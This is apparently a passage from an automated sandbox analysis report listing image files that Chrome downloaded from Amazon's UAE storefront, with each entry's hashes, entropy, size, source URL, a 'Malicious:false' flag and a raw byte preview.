                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):93021
                                                                                                                                                                                                                                                                      Entropy (8bit):7.66918235578333
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:4K0ckbn8ymIxL40ZMFXHWaERdtILuE//OLQOzC7Xaw3cJavB3jwsPwBe4dH:4K0cz+xLXMhH7OELuEYzCXd3cA52BZ
                                                                                                                                                                                                                                                                      MD5:0E1C526E038916BC7AFECF63CC78992D
                                                                                                                                                                                                                                                                      SHA1:14A3899906EE181AEC233A096033842BF3E9119C
                                                                                                                                                                                                                                                                      SHA-256:716F8B0BBFEE916278AB306652110061C54A0CDA6A4EF87F8D27E83F14E469BB
                                                                                                                                                                                                                                                                      SHA-512:20BDACD6D9F34C81FB3D140FDC4BF4A04DCF173FC13638B4E8AA316418957FC8819D9CD517A4482B8BD107FDFA8B8B9CB9AF0D6F5A22E8020EEE6AE8F7A4124A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/61wlGhMtZHL._SX3000_.jpg
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):33666
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911818033979578
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:VKFMGeW0JRohEfMpM0RZhYXJAAF6/Qdwqa:wFf/0Jxu3RZeXl66a
                                                                                                                                                                                                                                                                      MD5:45E05A383F4D65C70EC3D7FF3ED5AAF6
                                                                                                                                                                                                                                                                      SHA1:F4298F281A580292F00E65D2CC6EC61AFC77E266
                                                                                                                                                                                                                                                                      SHA-256:8158E9CA4DAA780DD043B293369A59038EB52F5F67D2640A6ABDB58BCC412864
                                                                                                                                                                                                                                                                      SHA-512:01B019B5A3D544B77704C5A71B3A61BF836DEC96E91B4AF504AF170E0A2F40B6DBF6E307A468CCFE87955FAE7EB7E588E41D59310E6AAAEFBFA6A8322812A2BB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................K..............................!.1.".#AQaq.$2...58....%&34Btu....7CRSTx.....................................A..........................!..1"A.Qa#2Bq......$R.....346bst.................?..@.. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ....Y.JA.Mz..8.[.'I.[...z>..~....5...${.@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..@..KC{..q~>..9.C.)........U.-]_.fk...y.2...dW.KJ&P.......7...+n.3._K77Mh........j.bKhTS.P.aLA).dE.&._b,...... ''.{$.1m..^.../...S.............D.F.H...v.F|...........s........./Y...R....G.%...""...nBuv%.{*..&d.H.#..^.q.w..zJx.>...;....V.|...G.Q.-w..w....k.M....o...nR.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):48950
                                                                                                                                                                                                                                                                      Entropy (8bit):7.963333607058689
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:83AZUS01W7NNNNKzXxmQViG7l0wK+4x0Zc/TfigEC+Vne8oWNIIzYUSuhO7jaZMM:aIUt1lx/VBlm+ZcDibC+VBocsUSv7Ia4
                                                                                                                                                                                                                                                                      MD5:A7350B040766C811565CE21F8D833908
                                                                                                                                                                                                                                                                      SHA1:1F8DAEF415AFD88E5D8B485E5C7D62941492BCD3
                                                                                                                                                                                                                                                                      SHA-256:EA2AC38C7E469084C70A134C536A212791FFC8AE20DEC4719ED555F6C61314AF
                                                                                                                                                                                                                                                                      SHA-512:F8DDA1C80EFBB0AA28C84E85276A495D226C53DA58665642DB7F3E9671C1CA3ED38E26BC58CBD8D41565B506B70916F99F7D13304AD5C1FC79BCC08EF9CBA31F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986213_UAE_Budget_Store_AE_xsite_bubbler_beauty_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;...................................................................................[a.....]...p.6.[..?\...^_~.U.._..J.......................`.....^...(.vE....../{~.H.]!%.!.9..~............ti....sdV.9..w8........%.*fv.......>P........~x...;4Ch.$){6............S&{F.%,..................+-..............lw<vM..\.l.........&[....].......r\4.z.'.~h.?:....z.....<S..o.......D87!......8}.....?.E..o.O.{.E..F....G..'x....1.l..........L...%.. .....,......@......u/{o......\...co5k.'.;bS....G...h...E[.m.5.*...e7#....i........D9.r8......y.../...Mb.k..t......H....ik.8wk-.....T..^.N....O`.b.(.0'Tv....;E...5.,.q.......<........n....i.L.2{...E..?*.-...9.-....4<u."..eW.s........H."e6.....q...A..>...........u......a.MY..6..7.C..q.G.yfLM.1.......r........x...*.<..........8.{1...l0...........F<...].a.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 750x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):21403
                                                                                                                                                                                                                                                                      Entropy (8bit):7.95064218890698
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:1reCA6Y7Z2EJVmtT5klBOFgYA69e17L7jj1Fs8nJMH8jdK:1r3W7NHmtdgBODVwl7n1Fs8i0dK
                                                                                                                                                                                                                                                                      MD5:E64F8360EA3135B7CC215BF01510E68A
                                                                                                                                                                                                                                                                      SHA1:852033D5266DA0E4C7D2168811B6115F90FF47D2
                                                                                                                                                                                                                                                                      SHA-256:D74856BE33DEE19A494D2075EBB87A4FDA125B6C98670C16BC92E8EC5C59A644
                                                                                                                                                                                                                                                                      SHA-512:6861731179AFAF17E1E85CD790A43DC85FE1D67C756EE229A037C05E6F24D0B9EA25863EDC39ECBD00DF4483D2191BABB4A3BCDAC9E8056AFAE4D282D7FF9A9A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/L2-Smartwatches-Pebble-750x300.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........,...."................................................ ................Eaa...r...............Q..hdn=_f............Yy.}.F....c..}.............{T.F...c>ZZgW..x.,...........x...........<..k:...Kl..W.dfU..u..u[..H.`.......q6T.....G.-._...p.].}....JT...........;/.od.......n..W..e.....^.Q..f......(..{*Jav..:...-.5z..n..v.|..-............lU{W.y.{X..s=.l...O7...U3.....=..;f.......F....l..+.zHq.=.U.....2<..i..p.;.=Q..........A...<R^.n..nZ.<D......dKO...............p....D..%.8..DL.Fg...&.{q..]'.yOC......-|..R.....D..6...O=......g}.s.5w..T.........o.6.S%..w|....7].....<dn.....a.. h..k..s$......w...I[..O...N.O.du..^..h....%:GGi\,z.........G..o..Z68...G.l.>z.3S.k..2=..W.3.:).y....x..V..............'.v7.........8.\u..MW..W...D...........v..?.....>7I.....|......j...[.;....../u...1..G........I.............
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4238
                                                                                                                                                                                                                                                                      Entropy (8bit):7.704720238700568
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R9+0YkxK07wxusjK47D0fo6LBySHzUUcdVCDbjux+z:e0wFz6LByhUC+nuk
                                                                                                                                                                                                                                                                      MD5:E085596AD1756B346493432818245583
                                                                                                                                                                                                                                                                      SHA1:499B90D2BCF4AF80F68AEEEE3A63044410AE70E1
                                                                                                                                                                                                                                                                      SHA-256:7ED66F86F3E12C85F976D5FEE535B26EF0EB45BCA3E6D32D985E44FC2E42FE20
                                                                                                                                                                                                                                                                      SHA-512:0396935B35D79CEDAE2164C64BED24A9E7118DB548C171B41D8E1AB8522F66B68543F1C8F1690432ED0B3C8324FAB752B0D5A69A2535EEAA8FF9BF29294FE7A9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:6C265640478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:6C26563F478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7432AE9D7C846B33C16FC475697925A7" stRef:documentID="7432AE9D7C846B33C16FC475697925A7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d...................b....................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 158x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3853
                                                                                                                                                                                                                                                                      Entropy (8bit):7.851898154968495
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TvYNRxsjz4TIRmuiMG5u7/k98WbI3tDT3uKlU3f9tbtQVVZe:TIRgzJmXew98WbatP+KlU3ntQVS
                                                                                                                                                                                                                                                                      MD5:CD266436638ABE7EE255107E7814CB34
                                                                                                                                                                                                                                                                      SHA1:4832E1DAA9710C44841F5315A9DD09E7FEB27D13
                                                                                                                                                                                                                                                                      SHA-256:FE71A7BA8625DE6E53DB2F6972240A441ACAC1E75731253DEA9F3FDB861292FA
                                                                                                                                                                                                                                                                      SHA-512:4D83119570526A6246CEC2DA076F6169741DB4B8A1742FA7FCED5C3FFABB6A133FC9A85F08367DCB09C8004EE4B65E9A5BDC8538FDAD37AC574E2CF85B00F9D2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51jqon2gG8L._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........{...................................................!.."1.AQRaq....BS...2C..$3brs..#.................................................?..])J.)J.)J.g:......r..R..b....}...N...+x".>..5.tU.\\..I.aW>.I._...k.h.`L...!.m.....~jJ).a.9.G.x.U{......H7.v.......i..mt!..F.u..i...<.....J#......R..R..R..R..R..R..R.....{=>q.}......>...yX*..1'.6.....H......?qT..[.......g...S..dq.CPHj.V...X`*.......x..i.a...*.Mp.D@....%....'..j.7%..\%..'9I."...`.......t.v.....C.bw......"x(..A.MCJ.]M8%9....u.r.'`'i.y...R....z.C,..a.?."[.."..`...xQ...".@.)@.)@.)@.)@.)@.)@.)A...e.....aT..6...Q..X.~.....+.....T.L......y.b..-."._c.j.:>.dI...$@..v9.............K.n....d.`..O...........0U,........S...%...W.....%......n..~.@..y. ...R..R..R.D..m.L1...8...+.m..Kx.f.B.d.I..O..S6..Y..|....X....V..S06...5.Bc}.lx...G..m.}.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):58
                                                                                                                                                                                                                                                                      Entropy (8bit):4.364819634194334
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:j4OiLEF1vjdKDMJldsM9fkLHn:j4DErdKDMbdsN
                                                                                                                                                                                                                                                                      MD5:B1935F865A4EADE8564B6EF4B022F27F
                                                                                                                                                                                                                                                                      SHA1:F42746792E52473C4D9E152ACEB7080550D3C1E5
                                                                                                                                                                                                                                                                      SHA-256:21C52B1622A4539BF82DBC7FD4A2638CDDE3B8151697EB5C4D3DBB426576FBAA
                                                                                                                                                                                                                                                                      SHA-512:9693E0CAD83BF557BDADDE705241F580ED85DB0375AC381A21FC10E020FF96386E68514356C3B15FDCAF7BDCB8D74804D794E63D5BC9F58245DBB18B6C9A8062
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://ad4e487cdd5709cc3620784412a14d5f0.profile.bcn50-p2.cloudfront.net/test.png
                                                                                                                                                                                                                                                                      Preview:Standard Amazon AWS CloudFront Profile Experiment Response
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x300, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24358
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9289530989980355
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:8vtpoU0lr5dEvVxBgj3nZMusal0hUW1gsZQmxUUEpDyiyjYqrNx:67o9NenBg1MuBlbWh2mwpDnyMqz
                                                                                                                                                                                                                                                                      MD5:49FCFBD51ADA5F6628EB1D0B0DBC2ED4
                                                                                                                                                                                                                                                                      SHA1:C94C018BAEC586CBBB8455483360118AE00E995F
                                                                                                                                                                                                                                                                      SHA-256:61044EF9C0F9B1148B6196ED173FFBB83A6B030E68B7EAF15D1BF8426F824F7E
                                                                                                                                                                                                                                                                      SHA-512:91D14D82876A5BCB1A0C431699B6C7FD098FFFAEF2F9871B4262712B5B2C79DC58439690615DC927D2044424863F3D4B6E3010012A01AEE4B85EF96603CF3370
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_Gold/xcm_banners_mena_440x300_coop_4col_phl-coolers_440x300_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C.......................................................................,...."...........................................E..............................!."1.Q.#..2Aaq.3...$4Bu...%&'5:.ev....................................;........................!1..AQ."aq...#2B.....3R..$bCSr..............?..C...1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a....1.a...w!..g..~.C.3..ITu... ..{...%..)y%Q.....`..m.I..+p,..[HH...{...O.1*....-.....FR..KH6@N%L...B.$..A.m.../x......Z..rF....#l.D........H..l....iB...>S]...."d^GW..X.%..k,4[...p.6.7..=x'.xS.v..L.u.c7.6.6...Z....j`....Z....6:"&...:=...C.....|..R.....q.3H..r....0.Q$`.m..V.....k......t..[...gE.w....S7d...+.rR..U5e.W..QE...b.I4....S.F.k.).v.l^.o.X.lSJ.km..6KVnJ..qa. .2A..v..U\8b.F.......g....r.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 159x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11862
                                                                                                                                                                                                                                                                      Entropy (8bit):7.965076868156287
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:lfI8l6tWZr07DaJnVoaAFG51emQHT/ceHJcnYgeyLQGEJfn/3A1/d:lQ8l/aD6nVo5qGzPHJcnYZyLQG0fned
                                                                                                                                                                                                                                                                      MD5:59B0EC3800623939D6761FDB1EC1188D
                                                                                                                                                                                                                                                                      SHA1:6DD86BDD0CA46339DC8F8575AD4D20987A849B3B
                                                                                                                                                                                                                                                                      SHA-256:05C97FC4ECEFCBD55D7E4A41F0EFE7CB27918AE8E0AD3F8723B3039F1202F241
                                                                                                                                                                                                                                                                      SHA-512:97D4E787F23988D1975F6664C4FB5D8E7E23970EC3533D21C6CD6F07777882FFB724D9029FB14C1B7C2A2388CC6ECE2F10CB11E0F1AECB5BAD40175CB0E4637F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.."AQ2aq.#b....BRU.....%STt....$35Edr........Cs..................................................!1..AQa."2q..#B....3.R................?.*..WM.kR..g="!":xVx....c..bH=l0....y..z..{c..-..a.i....s...0.gD.B..)F2.%.J..y...d..i$.L@m...|m..^q]..._..?:.}.v..m.4.U.O...Z|.$=.G.=;.kP.e..B....:..@.Y.%.i....... g...L....L.T........J...=.y...+............*...m.d..S...$.,.M....K.....Xt7R1...v.l..=$...y.B./.u.kZ0......m.,9..s..P.D..e.#.....O;.....Q:)>..I.$.\O.@..#.9m....[..&.X.......>..#........Y......~p..j.W..k..... j......d3.p[....5...Go......bGH.5O_P%...p....+>....G..W.}.V*u...P.A...Q.....Z........q.m]S...]N........YLvFN7..>f*.....G...o.....u..S..h\9.....q[..~......j?...Y......)..J.sM.\8.*....j.W.cF..g..i^...._..,D.o..M.~....K...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 319x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):29833
                                                                                                                                                                                                                                                                      Entropy (8bit):7.976488256817726
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:/t2ShEov+tDaQF1Y5VSxztARP8DY+5MsKDLq:MO2CVSxz0P8DYUMsKDG
                                                                                                                                                                                                                                                                      MD5:CE3F163F21702D26EAF2928CF67FE786
                                                                                                                                                                                                                                                                      SHA1:0500B43365F63BF474784B1B02A08ADCC9220FA4
                                                                                                                                                                                                                                                                      SHA-256:3D27075D354C28E6EA2024065E127593EEE66690915D1BBC15320CE4B85F5483
                                                                                                                                                                                                                                                                      SHA-512:9C597CED086906A74822DECA7A1B8B767875A9E85E81E627495091E2901D9475E6135D4AAA2E986E93112A7DC5398EB352F1D5DD2CA34E946B0E74A5197653D2
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71wHy1s3RbL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.?.."..........6...................................................................c......T.wulU4..SAlU4..SAlU4..S@A...Z..H<..g7.U.{K0.Yv..j...T.[.M..T.[.M..T.[.M..a......6*u>..s$..... ..eH.."I./,.y.&.b.&.b...7 ...3...... .z.&.b.&.b.&.b.&T......%.8@.....Q..]...:........V.k....82.-)%...9..~...x...D=..qiO.Kf.............S.....S._T....K.9Ug.g.3ep#l.\....:y.3..> .8...s...A...40...B8juZ.}..Mm~....,......B5.6.4.@...*.e....v.d.x".p=W...X...l....i..be.....yc.....eC..5~Qt.t..+...l.]rV.......207].....7".F...C.J~............Z:_....a.......2./y?@q...2...-U"T.V`......5.}..c.y7Yb..r...H...79S...A.40@...[fq.Q.L.....@....?.,\..v.fS]........[a.|..?5.O...Z....u.Z....7..V.%..0l;.V.:...NM....C.........O...?...s2>.k.......W.,...T.X..{X....h.{...;`...U~.u..s..~...A.s5.>.t.,.*.9C."..P..?n%.+.6.[.T...R..a...7O
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):39385
                                                                                                                                                                                                                                                                      Entropy (8bit):7.948506994397826
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8gLMZaPZ2SRcZakX05s/uZI4UzMjuqu2LN1EY0BX93cBdmfjuV:PZjrkX0+/uVfu2XqBX9sHmf0
                                                                                                                                                                                                                                                                      MD5:C7F67E9EE30FC682775AF02FC3FE1967
                                                                                                                                                                                                                                                                      SHA1:C70BDB7CB310C46B0EE8C7E66BA79633BF34D3A4
                                                                                                                                                                                                                                                                      SHA-256:FB362B603C9FF81C9E9C43D107E55E7DA11CF9F0EFA04BE9C804AFD1AD6B428A
                                                                                                                                                                                                                                                                      SHA-512:02D38553B7FB3EEAAA5C36133A9336C1339337C8BD728D64340F0A3B3D6886E7A91D618D66DA10FB79F8AC4BCB692E375363DB0B71BEF2DE518BD037BD258C8C
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986225_UAE_Budget_Store_AE_xsite_home_en_400x400_2X._CB644457597_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................:................................................................................`.-0....Yo.......u....u..._.c...f.U?p...?................=..-...Cc...xF@.......?\.f..IC.k...Z..@............j....hc.|N................s..I.=P........i......f."Hy|6..........fV+......@........Z..&..6ee .;..........U.....h..v.2.........M.a.lJ.............v.....O...M.@......C.r...T...P......t....T......;.x...~.y..8].. ......y..%.6.........f^....<.fMj...|7Mtn...].....p`..|..vSr?........-...9.r8.......1..C...7?............v....7U.NN...NK.;.@.x..9^......[.Y.V..\...P......}=...._.F..:.n..R.3.i.s........'..W..D.>.R..4...).......ddy.7..Wp......Q.7..~..'..)..(..3.i.y.nQ.7.T.>[5>A.....&..B.}..0..k..3...4.Ng ......?..7..~k..l.9..p.MG..e..^M..)..-.. ....S...&>..m.n0......y.'................A.6N...S......).....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):4537
                                                                                                                                                                                                                                                                      Entropy (8bit):7.411740565972414
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:1rX067VdoKqzgxWXGjGLa6GW9TcMlsEKYqeRH:1b067VdoR4oMGW2SMl7
                                                                                                                                                                                                                                                                      MD5:F614957EFC05DD17B1AA69D0EF18D976
                                                                                                                                                                                                                                                                      SHA1:4030C0932F667D0ACADBEC7B4488D264AF2B9A1E
                                                                                                                                                                                                                                                                      SHA-256:719F80787091590CA7BFDE03AADE494C7A4CCB1BA11EAE4D3BF124C7CE2F88D4
                                                                                                                                                                                                                                                                      SHA-512:1D49FBA0E2EEF4F9A990E6CF002931F1FFDFFA8FC26E718066E2D98C20CB3BCCB49BBF42ECFE525B340DDC4540AB7CC211DDF2EA0BD9759BDF60F4400880BE27
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................@........................x....................................-`.....ko............|>...........-J.c....kSrW....8]..G/ .......................6..9x..v.C8.lN.Re..w...sZ.........................I...........;j...d..$k...~@.........3..............l..*...!V.7hW.......o............g.........................>..................................................3.........................................................jh.............S2. ..........J.Vd......................................................................@.....k.j...~X............My.7....._P...........F-'^7........4..............."..........................`.p.. .............I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$.I$..W.|...c..?.R.........?..._'.u.8\...c.}....g#..0oO....Tm.W.....0".
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):3506
                                                                                                                                                                                                                                                                      Entropy (8bit):7.63220029011201
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TivGdIHAokkancJbXu12R7QYKCh7wuqBtCUEy+x2Nx:meNozL3QG7wV2LxS
                                                                                                                                                                                                                                                                      MD5:707066716577C7241A919AD769B3B4C1
                                                                                                                                                                                                                                                                      SHA1:66CA8162B63EED192EB864B2121894DECE74176A
                                                                                                                                                                                                                                                                      SHA-256:E58D5785C10057B25DEE737B091C44962D19AC1CF99CE00EF33AE2AF2D58DC82
